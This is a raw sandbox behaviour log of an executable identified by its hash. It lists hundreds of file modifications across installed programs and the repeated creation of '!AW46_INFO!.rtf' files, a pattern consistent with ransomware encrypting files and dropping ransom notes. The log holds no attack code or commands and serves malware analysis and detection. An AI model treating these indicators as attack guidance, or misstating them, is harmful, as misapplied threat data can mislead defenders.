7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Martinique 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Thule 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\native2ascii.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\dependentlibs.list 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Sakhalin 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ust-Nera 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\masterix.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javafx.policy 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-uihandler.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nome 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Warsaw 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_CN.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.SYX 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Abidjan 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\ResourceInternal.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Ushuaia 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tashkent 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5EDT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Costa_Rica 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+8 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\El_Aaiun 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Baku 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt_0.12.1.v20140903-1023.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cambridge_Bay 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\nb.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\logging.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler_1.2.0.v20140422-1847.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Boise 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Auckland 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kathmandu 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmc.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Kaliningrad 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.SF 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.ja_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\crashreporter.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Eirunepe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-javahelp_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_HK.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_TW.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\abcpy.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-sendopts.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4_1.0.800.v20140827-1444.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql90.xsl 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\calendars.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-options-keymap.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.rcp_4.3.100.v20141007-2301.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\UserControl.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Uzhgorod 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Metlakatla 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-windows_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-output2.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-core-kit_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jconsole.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\San_Juan 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\tzmappings 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\security\javaws.policy 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\DumontDUrville 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Choibalsan 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.metadata.repository.prefs 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\reader\filename.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-options-api.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-ui.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvSOFT.x3d 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Helsinki 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\oracle.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\jmxremote.access 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfo.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-3 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console_1.0.300.v20131113-1212.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Vdk10.rst 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_mac.css 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cayman 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\license.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+12 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_pl.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Puerto_Rico 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-8 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ust-Nera 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodbig.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Dawson 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Vladivostok 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Lindeman 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javafxpackager.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\default.vlt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setEmbeddedCP 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Gambier 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\jp2launcher.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.core_2.3.5.v201308161310.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\sv.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\java-rmi.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Monrovia 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\view.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunec.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-14 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Ndjamena 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dushanbe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\el.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dubai 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tongatapu 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Mazatlan 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-options_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Informix.xsl 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cayman 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program 